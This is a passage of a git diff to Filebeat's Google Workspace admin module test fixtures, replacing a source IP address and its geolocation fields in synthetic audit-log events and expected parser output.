"source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -750,7 +694,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_NAME\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_NAME\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -763,26 +707,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 5880, + "log.offset": 5866, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -803,7 +743,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -815,26 +755,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 6286, + "log.offset": 6271, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -855,7 +791,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"TOGGLE_SERVICE_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SERVICE_NAME\",\"value\":\"new\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"TOGGLE_SERVICE_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SERVICE_NAME\",\"value\":\"new\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -873,26 +809,22 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 6684, + "log.offset": 6668, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log
index 1035f42a2fbe..1a75621dca4e 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log
@@ -1,24 +1,24 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ADD_TO_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"REMOVE_FROM_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"BLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_START_DATE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"ALLOWED_TWO_STEP_VERIFICATION_METHOD","value":"ONLY_SECURITY_KEY"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"TOGGLE_CAA_ENABLEMENT","parameters":[{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_ERROR_MESSAGE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_APP_ASSIGNMENTS","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CAA_ASSIGNMENTS_NEW","value":"new"},{"name":"CAA_ASSIGNMENTS_OLD","value":"old"},{"name":"GROUP_NAME","value":"group"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"TRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ENFORCE_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"SESSION_CONTROL_SETTINGS_CHANGE","parameters":[{"name":"REAUTH_APPLICATION","value":"ADMIN_CONSOLE"},{"name":"REAUTH_SETTING_NEW","value":"INHERIT"},{"name":"REAUTH_SETTING_OLD","value":"NEVER"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_SESSION_LENGTH","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"UNBLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"CALENDAR"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ADD_TO_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"REMOVE_FROM_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"BLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_START_DATE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"ALLOWED_TWO_STEP_VERIFICATION_METHOD","value":"ONLY_SECURITY_KEY"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"TOGGLE_CAA_ENABLEMENT","parameters":[{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_ERROR_MESSAGE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_APP_ASSIGNMENTS","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CAA_ASSIGNMENTS_NEW","value":"new"},{"name":"CAA_ASSIGNMENTS_OLD","value":"old"},{"name":"GROUP_NAME","value":"group"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"TRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
